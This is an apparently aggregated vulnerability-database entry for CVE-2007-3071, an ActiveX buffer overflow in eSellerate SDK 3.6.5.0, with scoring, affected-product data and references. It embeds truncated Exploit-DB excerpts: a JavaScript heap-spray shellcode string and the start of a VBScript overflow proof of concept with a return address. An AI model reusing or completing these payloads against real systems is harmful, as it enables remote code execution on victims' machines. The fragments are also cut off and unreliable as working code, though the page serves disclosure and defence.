CVE-2007-3071
published 2007-06-06CVE-2007-3071: Buffer overflow in the GetWebStoreURL function in a certain ActiveX control in eSellerateControl365.dll 3.6.5.0 in eSellerate SDK allows user-assisted remote…
PriorityP337critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.84%
92.3th percentile
Buffer overflow in the GetWebStoreURL function in a certain ActiveX control in eSellerateControl365.dll 3.6.5.0 in eSellerate SDK allows user-assisted remote attackers to execute arbitrary code via a long first argument.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| digital_river | esellerate_sdk | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Tango DropBox 3.1.5 + PRO - Activex HeapSpray
exploitdb·2015-06-19
CVE-2007-3071 Tango DropBox 3.1.5 + PRO - Activex HeapSpray
Tango DropBox 3.1.5 + PRO - Activex HeapSpray
---
Tango DropBox Activex Heap Spray Exploit
Version:3.1.5 + PRO
The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the ''GetWebStoreURL' member.
Vendor Homepage:http://etonica.com/dropbox/index.html
Software Link:http://etonica.com/dropbox/download.html
Author: metacom
var heapspray=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000
Exploit-DB
eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow
exploitdb·2007-06-04
CVE-2007-3071 eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow
eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow
---
source: https://www.securityfocus.com/bid/24300/info
eSellerate SDK ActiveX control is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
This issue affects eSellerate SDK 3.6.5.0; other versions may also be affected.
Sub tryMe()
buff = String(997, "A")
get_EIP = unescape("%6B%AC%3F%7E") '0x7E3FAC6B call EBP from user32.dll
nop = String(24, unesc
No writeups or analysis indexed.
http://osvdb.org/38803http://www.securityfocus.com/bid/24300http://www.shinnai.altervista.org/exploits/esellerate.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/35003http://osvdb.org/38803http://www.securityfocus.com/bid/24300http://www.shinnai.altervista.org/exploits/esellerate.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/35003
2007-06-06
Published